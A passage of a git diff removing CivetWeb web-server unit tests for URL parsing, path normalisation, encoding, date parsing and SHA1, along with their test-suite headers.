-	ck_assert_int_eq(2, match_prefix("a|b|cd", 6, "cdef"));
-	ck_assert_int_eq(2, match_prefix("a|b|c?", 6, "cdef"));
-	ck_assert_int_eq(1, match_prefix("a|?|cd", 6, "cdef"));
-	ck_assert_int_eq(-1, match_prefix("/a/**.cgi", 9, "/foo/bar/x.cgi"));
-	ck_assert_int_eq(12, match_prefix("/a/**.cgi", 9, "/a/bar/x.cgi"));
-	ck_assert_int_eq(5, match_prefix("**/", 3, "/a/b/c"));
-	ck_assert_int_eq(-1, match_prefix("**/$", 4, "/a/b/c"));
-	ck_assert_int_eq(5, match_prefix("**/$", 4, "/a/b/"));
-	ck_assert_int_eq(0, match_prefix("$", 1, ""));
-	ck_assert_int_eq(-1, match_prefix("$", 1, "x"));
-	ck_assert_int_eq(1, match_prefix("*$", 2, "x"));
-	ck_assert_int_eq(1, match_prefix("/$", 2, "/"));
-	ck_assert_int_eq(-1, match_prefix("**/$", 4, "/a/b/c"));
-	ck_assert_int_eq(5, match_prefix("**/$", 4, "/a/b/"));
-	ck_assert_int_eq(0, match_prefix("*", 1, "/hello/"));
-	ck_assert_int_eq(-1, match_prefix("**.a$|**.b$", 11, "/a/b.b/"));
-	ck_assert_int_eq(6, match_prefix("**.a$|**.b$", 11, "/a/b.b"));
-	ck_assert_int_eq(6, match_prefix("**.a$|**.b$", 11, "/a/B.A"));
-	ck_assert_int_eq(5, match_prefix("**o$", 4, "HELLO"));
-}
-END_TEST
-
-
-START_TEST(test_remove_double_dots_and_double_slashes)
-{
-	/* Adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	struct {
-		char before[20], after[20];
-	} data[] = {
-	    {"////a", "/a"},
-	    {"/.....", "/."},
-	    {"/......", "/"},
-	    {"..", "."},
-	    {"...", "."},
-	    {"/...///", "/./"},
-	    {"/a...///", "/a.../"},
-	    {"/.x", "/.x"},
-	    {"/\\", "/"},
-	    {"/a\\", "/a\\"},
-	    {"/a\\\\...", "/a\\."},
-	};
-	size_t i;
-
-	mark_point();
-
-	for (i = 0; i < ARRAY_SIZE(data); i++) {
-		remove_double_dots_and_double_slashes(data[i].before);
-		ck_assert_str_eq(data[i].before, data[i].after);
-	}
-}
-END_TEST
-
-
-START_TEST(test_is_valid_uri)
-{
-	/* is_valid_uri is superseeded by get_uri_type */
-	ck_assert_int_eq(2, get_uri_type("/api"));
-	ck_assert_int_eq(2, get_uri_type("/api/"));
-	ck_assert_int_eq(2,
-	                 get_uri_type("/some/long/path%20with%20space/file.xyz"));
-	ck_assert_int_eq(0, get_uri_type("api"));
-	ck_assert_int_eq(1, get_uri_type("*"));
-	ck_assert_int_eq(0, get_uri_type("*xy"));
-	ck_assert_int_eq(3, get_uri_type("http://somewhere/"));
-	ck_assert_int_eq(3, get_uri_type("https://somewhere/some/file.html"));
-	ck_assert_int_eq(4, get_uri_type("http://somewhere:8080/"));
-	ck_assert_int_eq(4, get_uri_type("https://somewhere:8080/some/file.html"));
-}
-END_TEST
-
-
-START_TEST(test_next_option)
-{
-	/* Adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	const char *p, *list = "x/8,/y**=1;2k,z";
-	struct vec a, b;
-	int i;
-
-	mark_point();
-
-	ck_assert(next_option(NULL, &a, &b) == NULL);
-	for (i = 0, p = list; (p = next_option(p, &a, &b)) != NULL; i++) {
-		ck_assert(i != 0 || (a.ptr == list && a.len == 3 && b.len == 0));
-		ck_assert(i != 1
-		          || (a.ptr == list + 4 && a.len == 4 && b.ptr == list + 9
-		              && b.len == 4));
-		ck_assert(i != 2 || (a.ptr == list + 14 && a.len == 1 && b.len == 0));
-	}
-}
-END_TEST
-
-
-START_TEST(test_skip_quoted)
-{
-	/* Adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	char x[] = "a=1, b=2, c='hi \' there', d='here\\, there'", *s = x, *p;
-
-	mark_point();
-
-	p = skip_quoted(&s, ", ", ", ", 0);
-	ck_assert(p != NULL && !strcmp(p, "a=1"));
-
-	p = skip_quoted(&s, ", ", ", ", 0);
-	ck_assert(p != NULL && !strcmp(p, "b=2"));
-
-	p = skip_quoted(&s, ",", " ", 0);
-	ck_assert(p != NULL && !strcmp(p, "c='hi \' there'"));
-
-	p = skip_quoted(&s, ",", " ", '\\');
-	ck_assert(p != NULL && !strcmp(p, "d='here, there'"));
-	ck_assert(*s == 0);
-}
-END_TEST
-
-
-static int
-alloc_printf(char **buf, size_t size, const char *fmt, ...)
-{
-	/* Test helper function - adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	va_list ap;
-	int ret = 0;
-
-	mark_point();
-
-	va_start(ap, fmt);
-	ret = alloc_vprintf(buf, *buf, size, fmt, ap);
-	va_end(ap);
-
-	return ret;
-}
-
-
-static int
-alloc_printf2(char **buf, const char *fmt, ...)
-{
-	/* Test alternative implementation */
-	va_list ap;
-	int ret = 0;
-
-	mark_point();
-
-	va_start(ap, fmt);
-	ret = alloc_vprintf2(buf, fmt, ap);
-	va_end(ap);
-
-	return ret;
-}
-
-
-START_TEST(test_alloc_vprintf)
-{
-	/* Adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	char buf[MG_BUF_LEN], *p = buf;
-	mark_point();
-
-	ck_assert(alloc_printf(&p, sizeof(buf), "%s", "hi") == 2);
-	ck_assert(p == buf);
-
-	ck_assert(alloc_printf(&p, sizeof(buf), "%s", "") == 0);
-	ck_assert(p == buf);
-
-	ck_assert(alloc_printf(&p, sizeof(buf), "") == 0);
-	ck_assert(p == buf);
-
-	/* Pass small buffer, make sure alloc_printf allocates */
-	ck_assert(alloc_printf(&p, 1, "%s", "hello") == 5);
-	ck_assert(p != buf);
-	mg_free(p);
-	p = buf;
-
-	/* Test alternative implementation */
-	ck_assert(alloc_printf2(&p, "%s", "hello") == 5);
-	ck_assert(p != buf);
-	mg_free(p);
-	p = buf;
-}
-END_TEST
-
-
-START_TEST(test_mg_vsnprintf)
-{
-	char buf[16];
-	int is_trunc;
-
-#if defined(_WIN32)
-	/* If the string is truncated, mg_snprintf calls mg_cry.
-	 * If DEBUG is defined, mg_cry calls DEBUG_TRACE.
-	 * In DEBUG_TRACE_FUNC, flockfile(stdout) is called.
-	 * For Windows, flockfile/funlockfile calls Enter-/
-	 * LeaveCriticalSection(&global_log_file_lock).
-	 * So, we need to initialize global_log_file_lock:
-	 */
-	InitializeCriticalSection(&global_log_file_lock);
-#endif
-
-	memset(buf, 0, sizeof(buf));
-	mark_point();
-
-	is_trunc = 777;
-	mg_snprintf(NULL, &is_trunc, buf, 10, "%8i", 123);
-	ck_assert_str_eq(buf, "     123");
-	ck_assert_int_eq(is_trunc, 0);
-
-	is_trunc = 777;
-	mg_snprintf(NULL, &is_trunc, buf, 10, "%9i", 123);
-	ck_assert_str_eq(buf, "      123");
-	ck_assert_int_eq(is_trunc, 0);
-
-	is_trunc = 777;
-	mg_snprintf(NULL, &is_trunc, buf, 9, "%9i", 123);
-	ck_assert_str_eq(buf, "      12");
-	ck_assert_int_eq(is_trunc, 1);
-
-	is_trunc = 777;
-	mg_snprintf(NULL, &is_trunc, buf, 8, "%9i", 123);
-	ck_assert_str_eq(buf, "      1");
-	ck_assert_int_eq(is_trunc, 1);
-
-	is_trunc = 777;
-	mg_snprintf(NULL, &is_trunc, buf, 7, "%9i", 123);
-	ck_assert_str_eq(buf, "      ");
-	ck_assert_int_eq(is_trunc, 1);
-
-	is_trunc = 777;
-	strcpy(buf, "1234567890");
-	mg_snprintf(NULL, &is_trunc, buf, 0, "%i", 543);
-	ck_assert_str_eq(buf, "1234567890");
-	ck_assert_int_eq(is_trunc, 1);
-}
-END_TEST
-
-
-START_TEST(test_mg_strcasestr)
-{
-	/* Adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	static const char *big1 = "abcdef";
-	mark_point();
-
-	ck_assert(mg_strcasestr("Y", "X") == NULL);
-	ck_assert(mg_strcasestr("Y", "y") != NULL);
-	ck_assert(mg_strcasestr(big1, "X") == NULL);
-	ck_assert(mg_strcasestr(big1, "CD") == big1 + 2);
-	ck_assert(mg_strcasestr("aa", "AAB") == NULL);
-}
-END_TEST
-
-
-START_TEST(test_parse_port_string)
-{
-	/* Adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	static const char *valid[] =
-	{ "0",
-	  "1",
-	  "1s",
-	  "1r",
-	  "1.2.3.4:1",
-	  "1.2.3.4:1s",
-	  "1.2.3.4:1r",
-#if defined(USE_IPV6)
-	  "[::1]:123",
-	  "[::]:80",
-	  "[3ffe:2a00:100:7031::1]:900",
-	  "+80",
-#endif
-	  NULL };
-	static const char *invalid[] = {
-	    "99999", "1k", "1.2.3", "1.2.3.4:", "1.2.3.4:2p", NULL};
-	struct socket so;
-	struct vec vec;
-	int ip_family;
-	int i;
-
-	mark_point();
-
-	for (i = 0; valid[i] != NULL; i++) {
-		vec.ptr = valid[i];
-		vec.len = strlen(vec.ptr);
-		ip_family = 123;
-		ck_assert_int_ne(parse_port_string(&vec, &so, &ip_family), 0);
-		if (i < 7) {
-			ck_assert_int_eq(ip_family, 4);
-		} else if (i < 10) {
-			ck_assert_int_eq(ip_family, 6);
-		} else {
-			ck_assert_int_eq(ip_family, 4 + 6);
-		}
-	}
-
-	for (i = 0; invalid[i] != NULL; i++) {
-		vec.ptr = invalid[i];
-		vec.len = strlen(vec.ptr);
-		ip_family = 123;
-		ck_assert_int_eq(parse_port_string(&vec, &so, &ip_family), 0);
-		ck_assert_int_eq(ip_family, 0);
-	}
-}
-END_TEST
-
-
-START_TEST(test_encode_decode)
-{
-	char buf[128];
-	const char *alpha = "abcdefghijklmnopqrstuvwxyz";
-	const char *nonalpha = " !\"#$%&'()*+,-./0123456789:;<=>?@";
-	const char *nonalpha_url_enc1 =
-	    "%20%21%22%23$%25%26%27()%2a%2b,-.%2f0123456789%3a;%3c%3d%3e%3f%40";
-	const char *nonalpha_url_enc2 =
-	    "%20!%22%23%24%25%26'()*%2B%2C-.%2F0123456789%3A%3B%3C%3D%3E%3F%40";
-	int ret;
-	size_t len;
-
-#if defined(USE_WEBSOCKET) || defined(USE_LUA)
-	const char *alpha_b64_enc = "YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXo=";
-	const char *nonalpha_b64_enc =
-	    "ICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9A";
-
-	mark_point();
-
-	memset(buf, 77, sizeof(buf));
-	base64_encode((unsigned char *)"a", 1, buf);
-	ck_assert_str_eq(buf, "YQ==");
-
-	memset(buf, 77, sizeof(buf));
-	base64_encode((unsigned char *)"ab", 1, buf);
-	ck_assert_str_eq(buf, "YQ==");
-
-	memset(buf, 77, sizeof(buf));
-	base64_encode((unsigned char *)"ab", 2, buf);
-	ck_assert_str_eq(buf, "YWI=");
-
-	memset(buf, 77, sizeof(buf));
-	base64_encode((unsigned char *)alpha, 3, buf);
-	ck_assert_str_eq(buf, "YWJj");
-
-	memset(buf, 77, sizeof(buf));
-	base64_encode((unsigned char *)alpha, 4, buf);
-	ck_assert_str_eq(buf, "YWJjZA==");
-
-	memset(buf, 77, sizeof(buf));
-	base64_encode((unsigned char *)alpha, 5, buf);
-	ck_assert_str_eq(buf, "YWJjZGU=");
-
-	memset(buf, 77, sizeof(buf));
-	base64_encode((unsigned char *)alpha, 6, buf);
-	ck_assert_str_eq(buf, "YWJjZGVm");
-
-	memset(buf, 77, sizeof(buf));
-	base64_encode((unsigned char *)alpha, (int)strlen(alpha), buf);
-	ck_assert_str_eq(buf, alpha_b64_enc);
-
-	memset(buf, 77, sizeof(buf));
-	base64_encode((unsigned char *)nonalpha, (int)strlen(nonalpha), buf);
-	ck_assert_str_eq(buf, nonalpha_b64_enc);
-#endif
-
-#if defined(USE_LUA)
-	memset(buf, 77, sizeof(buf));
-	len = 9999;
-	ret = base64_decode((unsigned char *)alpha_b64_enc,
-	                    (int)strlen(alpha_b64_enc),
-	                    buf,
-	                    &len);
-	ck_assert_int_eq(ret, -1);
-	ck_assert_uint_eq((unsigned int)len, (unsigned int)strlen(alpha));
-	ck_assert_str_eq(buf, alpha);
-
-	memset(buf, 77, sizeof(buf));
-	len = 9999;
-	ret = base64_decode((unsigned char *)"AAA*AAA", 7, buf, &len);
-	ck_assert_int_eq(ret, 3);
-#endif
-
-	memset(buf, 77, sizeof(buf));
-	ret = mg_url_encode(alpha, buf, sizeof(buf));
-	ck_assert_int_eq(ret, (int)strlen(buf));
-	ck_assert_int_eq(ret, (int)strlen(alpha));
-	ck_assert_str_eq(buf, alpha);
-
-	memset(buf, 77, sizeof(buf));
-	ret = mg_url_encode(nonalpha, buf, sizeof(buf));
-	ck_assert_int_eq(ret, (int)strlen(buf));
-	ck_assert_int_eq(ret, (int)strlen(nonalpha_url_enc1));
-	ck_assert_str_eq(buf, nonalpha_url_enc1);
-
-	memset(buf, 77, sizeof(buf));
-	ret = mg_url_decode(alpha, (int)strlen(alpha), buf, sizeof(buf), 0);
-	ck_assert_int_eq(ret, (int)strlen(buf));
-	ck_assert_int_eq(ret, (int)strlen(alpha));
-	ck_assert_str_eq(buf, alpha);
-
-	memset(buf, 77, sizeof(buf));
-	ret = mg_url_decode(
-	    nonalpha_url_enc1, (int)strlen(nonalpha_url_enc1), buf, sizeof(buf), 0);
-	ck_assert_int_eq(ret, (int)strlen(buf));
-	ck_assert_int_eq(ret, (int)strlen(nonalpha));
-	ck_assert_str_eq(buf, nonalpha);
-
-	memset(buf, 77, sizeof(buf));
-	ret = mg_url_decode(
-	    nonalpha_url_enc2, (int)strlen(nonalpha_url_enc2), buf, sizeof(buf), 0);
-	ck_assert_int_eq(ret, (int)strlen(buf));
-	ck_assert_int_eq(ret, (int)strlen(nonalpha));
-	ck_assert_str_eq(buf, nonalpha);
-
-	/* len could be unused, if base64_decode is not tested because USE_LUA is
-	 * not defined */
-	(void)len;
-}
-END_TEST
-
-
-START_TEST(test_mask_data)
-{
-#if defined(USE_WEBSOCKET)
-	char in[1024];
-	char out[1024];
-	int i;
-#endif
-
-	uint32_t mask = 0x61626364;
-	/* TODO: adapt test for big endian */
-	ck_assert((*(unsigned char *)&mask) == 0x64u);
-
-#if defined(USE_WEBSOCKET)
-	memset(in, 0, sizeof(in));
-	memset(out, 99, sizeof(out));
-
-	mask_data(in, sizeof(out), 0, out);
-	ck_assert(!memcmp(out, in, sizeof(out)));
-
-	for (i = 0; i < 1024; i++) {
-		in[i] = (char)((unsigned char)i);
-	}
-	mask_data(in, 107, 0, out);
-	ck_assert(!memcmp(out, in, 107));
-
-	mask_data(in, 256, 0x01010101, out);
-	for (i = 0; i < 256; i++) {
-		ck_assert_int_eq((int)((unsigned char)out[i]),
-		                 (int)(((unsigned char)in[i]) ^ (char)1u));
-	}
-	for (i = 256; i < (int)sizeof(out); i++) {
-		ck_assert_int_eq((int)((unsigned char)out[i]), (int)0);
-	}
-
-	/* TODO: check this for big endian */
-	mask_data(in, 5, 0x01020304, out);
-	ck_assert_uint_eq((unsigned char)out[0], 0u ^ 4u);
-	ck_assert_uint_eq((unsigned char)out[1], 1u ^ 3u);
-	ck_assert_uint_eq((unsigned char)out[2], 2u ^ 2u);
-	ck_assert_uint_eq((unsigned char)out[3], 3u ^ 1u);
-	ck_assert_uint_eq((unsigned char)out[4], 4u ^ 4u);
-#endif
-}
-END_TEST
-
-
-START_TEST(test_parse_date_string)
-{
-#if !defined(NO_CACHING)
-	time_t now = time(0);
-	struct tm *tm = gmtime(&now);
-	char date[64] = {0};
-	unsigned long i;
-
-	ck_assert_uint_eq((unsigned long)parse_date_string("1/Jan/1970 00:01:02"),
-	                  62ul);
-	ck_assert_uint_eq((unsigned long)parse_date_string("1 Jan 1970 00:02:03"),
-	                  123ul);
-	ck_assert_uint_eq((unsigned long)parse_date_string("1-Jan-1970 00:03:04"),
-	                  184ul);
-	ck_assert_uint_eq((unsigned long)parse_date_string(
-	                      "Xyz, 1 Jan 1970 00:04:05"),
-	                  245ul);
-
-	gmt_time_string(date, sizeof(date), &now);
-	ck_assert_uint_eq((uintmax_t)parse_date_string(date), (uintmax_t)now);
-
-	sprintf(date,
-	        "%02u %s %04u %02u:%02u:%02u",
-	        tm->tm_mday,
-	        month_names[tm->tm_mon],
-	        tm->tm_year + 1900,
-	        tm->tm_hour,
-	        tm->tm_min,
-	        tm->tm_sec);
-	ck_assert_uint_eq((uintmax_t)parse_date_string(date), (uintmax_t)now);
-
-	gmt_time_string(date, 1, NULL);
-	ck_assert_str_eq(date, "");
-	gmt_time_string(date, 6, NULL);
-	ck_assert_str_eq(date,
-	                 "Thu, "); /* part of "Thu, 01 Jan 1970 00:00:00 GMT" */
-	gmt_time_string(date, sizeof(date), NULL);
-	ck_assert_str_eq(date, "Thu, 01 Jan 1970 00:00:00 GMT");
-
-	for (i = 2ul; i < 0x8000000ul; i += i / 2) {
-		now = (time_t)i;
-
-		gmt_time_string(date, sizeof(date), &now);
-		ck_assert_uint_eq((uintmax_t)parse_date_string(date), (uintmax_t)now);
-
-		tm = gmtime(&now);
-		sprintf(date,
-		        "%02u-%s-%04u %02u:%02u:%02u",
-		        tm->tm_mday,
-		        month_names[tm->tm_mon],
-		        tm->tm_year + 1900,
-		        tm->tm_hour,
-		        tm->tm_min,
-		        tm->tm_sec);
-		ck_assert_uint_eq((uintmax_t)parse_date_string(date), (uintmax_t)now);
-	}
-#endif
-}
-END_TEST
-
-
-START_TEST(test_sha1)
-{
-#ifdef SHA1_DIGEST_SIZE
-	SHA_CTX sha_ctx;
-	uint8_t digest[SHA1_DIGEST_SIZE] = {0};
-	char str[48] = {0};
-	int i;
-	const char *test_str;
-
-	ck_assert_uint_eq(sizeof(digest), 20);
-	ck_assert_uint_gt(sizeof(str), sizeof(digest) * 2 + 1);
-
-	/* empty string */
-	SHA1_Init(&sha_ctx);
-	SHA1_Final(digest, &sha_ctx);
-	bin2str(str, digest, sizeof(digest));
-	ck_assert_uint_eq(strlen(str), 40);
-	ck_assert_str_eq(str, "da39a3ee5e6b4b0d3255bfef95601890afd80709");
-
-	/* empty string */
-	SHA1_Init(&sha_ctx);
-	SHA1_Update(&sha_ctx, (uint8_t *)"abc", 0);
-	SHA1_Final(digest, &sha_ctx);
-	bin2str(str, digest, sizeof(digest));
-	ck_assert_uint_eq(strlen(str), 40);
-	ck_assert_str_eq(str, "da39a3ee5e6b4b0d3255bfef95601890afd80709");
-
-	/* "abc" */
-	SHA1_Init(&sha_ctx);
-	SHA1_Update(&sha_ctx, (uint8_t *)"abc", 3);
-	SHA1_Final(digest, &sha_ctx);
-	bin2str(str, digest, sizeof(digest));
-	ck_assert_uint_eq(strlen(str), 40);
-	ck_assert_str_eq(str, "a9993e364706816aba3e25717850c26c9cd0d89d");
-
-	/* "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq" */
-	test_str = "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq";
-	SHA1_Init(&sha_ctx);
-	SHA1_Update(&sha_ctx, (uint8_t *)test_str, (uint32_t)strlen(test_str));
-	SHA1_Final(digest, &sha_ctx);
-	bin2str(str, digest, sizeof(digest));
-	ck_assert_uint_eq(strlen(str), 40);
-	ck_assert_str_eq(str, "84983e441c3bd26ebaae4aa1f95129e5e54670f1");
-
-	/* a million "a" */
-	SHA1_Init(&sha_ctx);
-	for (i = 0; i < 1000000; i++) {
-		SHA1_Update(&sha_ctx, (uint8_t *)"a", 1);
-	}
-	SHA1_Final(digest, &sha_ctx);
-	bin2str(str, digest, sizeof(digest));
-	ck_assert_uint_eq(strlen(str), 40);
-	ck_assert_str_eq(str, "34aa973cd4c4daa4f61eeb2bdbad27316534016f");
-
-	/* a million "a" in blocks of 10 */
-	SHA1_Init(&sha_ctx);
-	for (i = 0; i < 100000; i++) {
-		SHA1_Update(&sha_ctx, (uint8_t *)"aaaaaaaaaa", 10);
-	}
-	SHA1_Final(digest, &sha_ctx);
-	bin2str(str, digest, sizeof(digest));
-	ck_assert_uint_eq(strlen(str), 40);
-	ck_assert_str_eq(str, "34aa973cd4c4daa4f61eeb2bdbad27316534016f");
-#else
-	/* Can not test, if SHA1 is not included */
-	ck_assert(1);
-#endif
-}
-END_TEST
-
-
-#if !defined(REPLACE_CHECK_FOR_LOCAL_DEBUGGING)
-Suite *
-make_private_suite(void)
-{
-	Suite *const suite = suite_create("Private");
-
-	TCase *const tcase_http_message = tcase_create("HTTP Message");
-	TCase *const tcase_http_keep_alive = tcase_create("HTTP Keep Alive");
-	TCase *const tcase_url_parsing_1 = tcase_create("URL Parsing 1");
-	TCase *const tcase_url_parsing_2 = tcase_create("URL Parsing 2");
-	TCase *const tcase_url_parsing_3 = tcase_create("URL Parsing 3");
-	TCase *const tcase_internal_parse_1 = tcase_create("Internal Parsing 1");
-	TCase *const tcase_internal_parse_2 = tcase_create("Internal Parsing 2");
-	TCase *const tcase_internal_parse_3 = tcase_create("Internal Parsing 3");
-	TCase *const tcase_internal_parse_4 = tcase_create("Internal Parsing 4");
-	TCase *const tcase_internal_parse_5 = tcase_create("Internal Parsing 5");
-	TCase *const tcase_internal_parse_6 = tcase_create("Internal Parsing 6");
-	TCase *const tcase_encode_decode = tcase_create("Encode Decode");
-	TCase *const tcase_mask_data = tcase_create("Mask Data");
-	TCase *const tcase_parse_date_string = tcase_create("Date Parsing");
-	TCase *const tcase_sha1 = tcase_create("SHA1");
-
-	tcase_add_test(tcase_http_message, test_parse_http_message);
-	tcase_set_timeout(tcase_http_message, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_http_message);
-
-	tcase_add_test(tcase_http_keep_alive, test_should_keep_alive);
-	tcase_set_timeout(tcase_http_keep_alive, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_http_keep_alive);
-
-	tcase_add_test(tcase_url_parsing_1, test_match_prefix);
-	tcase_set_timeout(tcase_url_parsing_1, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_url_parsing_1);
-
-	tcase_add_test(tcase_url_parsing_2,
-	               test_remove_double_dots_and_double_slashes);
-	tcase_set_timeout(tcase_url_parsing_2, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_url_parsing_2);
-
-	tcase_add_test(tcase_url_parsing_3, test_is_valid_uri);
-	tcase_set_timeout(tcase_url_parsing_3, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_url_parsing_3);
-
-	tcase_add_test(tcase_internal_parse_1, test_next_option);
-	tcase_set_timeout(tcase_internal_parse_1, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_internal_parse_1);
-
-	tcase_add_test(tcase_internal_parse_2, test_skip_quoted);
-	tcase_set_timeout(tcase_internal_parse_2, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_internal_parse_2);
-
-	tcase_add_test(tcase_internal_parse_3, test_mg_strcasestr);
-	tcase_set_timeout(tcase_internal_parse_3, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_internal_parse_3);
-
-	tcase_add_test(tcase_internal_parse_4, test_alloc_vprintf);
-	tcase_set_timeout(tcase_internal_parse_4, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_internal_parse_4);
-
-	tcase_add_test(tcase_internal_parse_5, test_mg_vsnprintf);
-	tcase_set_timeout(tcase_internal_parse_5, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_internal_parse_5);
-
-	tcase_add_test(tcase_internal_parse_6, test_parse_port_string);
-	tcase_set_timeout(tcase_internal_parse_6, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_internal_parse_6);
-
-	tcase_add_test(tcase_encode_decode, test_encode_decode);
-	tcase_set_timeout(tcase_encode_decode, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_encode_decode);
-
-	tcase_add_test(tcase_mask_data, test_mask_data);
-	tcase_set_timeout(tcase_mask_data, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_mask_data);
-
-	tcase_add_test(tcase_parse_date_string, test_parse_date_string);
-	tcase_set_timeout(tcase_parse_date_string, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_parse_date_string);
-
-	tcase_add_test(tcase_sha1, test_sha1);
-	tcase_set_timeout(tcase_sha1, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_sha1);
-
-	return suite;
-}
-#endif
-
-
-#ifdef REPLACE_CHECK_FOR_LOCAL_DEBUGGING
-/* Used to debug test cases without using the check framework */
-
-void
-MAIN_PRIVATE(void)
-{
-#if defined(_WIN32)
-	/* test_parse_port_string requires WSAStartup for IPv6 */
-	WSADATA data;
-	WSAStartup(MAKEWORD(2, 2), &data);
-#endif
-
-	test_alloc_vprintf(0);
-	test_mg_vsnprintf(0);
-	test_remove_double_dots_and_double_slashes(0);
-	test_parse_date_string(0);
-	test_parse_port_string(0);
-	test_parse_http_message(0);
-	test_sha1(0);
-
-#if defined(_WIN32)
-	WSACleanup();
-#endif
-}
-
-#endif
diff --git a/thirdparty/civetweb-1.10/test/private.h b/thirdparty/civetweb-1.10/test/private.h
deleted file mode 100644
index 670b665..0000000
--- a/thirdparty/civetweb-1.10/test/private.h
+++ /dev/null
@@ -1,28 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-#ifndef TEST_PRIVATE_H_
-#define TEST_PRIVATE_H_
-
-#include "civetweb_check.h"
-
-Suite *make_private_suite(void);
-
-#endif /* TEST_PRIVATE_H_ */
diff --git a/thirdparty/civetweb-1.10/test/private_exe.c b/thirdparty/civetweb-1.10/test/private_exe.c
deleted file mode 100644
index 9131eff..0000000
--- a/thirdparty/civetweb-1.10/test/private_exe.c
+++ /dev/null
@@ -1,82 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-
-/**
- * We include the source file so that we have access to the internal private
- * static functions.
- */
-#ifdef _MSC_VER
-#ifndef _CRT_SECURE_NO_WARNINGS
-#define _CRT_SECURE_NO_WARNINGS
-#endif
-#endif
-
-#include "private_exe.h"
-
-/* This is required for "realpath". According to
- * http://man7.org/linux/man-pages/man3/realpath.3.html
- * defining _XOPEN_SOURCE 600 should be enough, but in
- * practice this does not work. */
-extern char *realpath(const char *path, char *resolved_path);
-
-/* main is already used in the test suite,
- * so this define will rename main in main.c */
-#define main exe_main
-
-#include "../src/main.c"
-
-#include <stdlib.h>
-
-/* This unit test file uses the excellent Check unit testing library.
- * The API documentation is available here:
- * http://check.sourceforge.net/doc/check_html/index.html
- */
-
-START_TEST(test_helper_funcs)
-{
-	const char *psrc = "test str";
-	char *pdst;
-
-	/* test sdup */
-	pdst = sdup(psrc);
-	ck_assert(pdst != NULL);
-	ck_assert_str_eq(pdst, psrc);
-	ck_assert_ptr_ne(pdst, psrc);
-	free(pdst);
-}
-END_TEST
-
-
-#if !defined(REPLACE_CHECK_FOR_LOCAL_DEBUGGING)
-Suite *
-make_private_exe_suite(void)
-{
-	Suite *const suite = suite_create("EXE");
-
-	TCase *const tcase_helper_funcs = tcase_create("Helper funcs");
-
-	tcase_add_test(tcase_helper_funcs, test_helper_funcs);
-	tcase_set_timeout(tcase_helper_funcs, civetweb_min_test_timeout);
